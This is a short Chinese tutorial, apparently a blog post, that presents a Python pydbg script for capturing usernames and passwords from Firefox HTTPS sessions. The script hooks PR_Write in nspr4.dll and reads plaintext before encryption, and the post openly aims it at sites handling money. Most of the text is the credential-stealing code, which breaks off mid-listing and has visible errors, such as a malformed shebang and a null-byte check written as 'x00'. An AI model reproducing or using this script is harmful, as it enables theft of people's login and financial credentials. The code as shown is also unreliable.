相對于http協議，http是的特點就是他的安全性，http協議的通信內容用普通的嗅探器可以捕捉到，但是https協議的內容嗅探到的是加密后的內容，對我們的利用價值不是很高，所以一些大的網站----涉及到“大米”的網站，采用的都是http是協議，嘿嘿，即便這樣，還是有辦法能看到他的用戶名和密碼的，嘿嘿，本文只是用于技術學習，只是和大家交流技術，希望不要用于做違法的事情，這個例子是在firefox瀏覽器下登錄https協議的網站，我們預先打開程序，就來了個捕獲用戶名和密碼：

下面是源代碼：

代碼如下:
#!/ur/bin/env python    
from pydbg import *
from pydbg.defines import *

import utils    
import sys    

dbg = pydbg()    
found_firefox = False

pattern = "password"

         
def ssl_sniff( dbg, args ):    
    buffer = ""    
    offset = 0

    while 1:    
        byte = dbg.read_process_memory( args[1] + offset, 1 )    
        if byte != "x00":    
            buffer += byte    
            offset += 1
            continue
        else:    
            break
    if pattern in buffer:    
        print "Pre-Encrypted: %s" % buffer
    return DBG_CONTINUE    
# 尋找firefox.exe的進程    
for (pid, name) in dbg.enumerate_processes():    
    if name.lower() == "firefox.exe":    
        found_firefox = True
        hooks = utils.hook_container()    
        dbg.attach(pid)    
        print "[*] Attaching to firefox.exe with PID: %d" % pid    
# 得到firefox的hook的 address    
        hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")    
        if hook_address:    
# 添加hook的內容，包括他的pid，地址，嗅探類型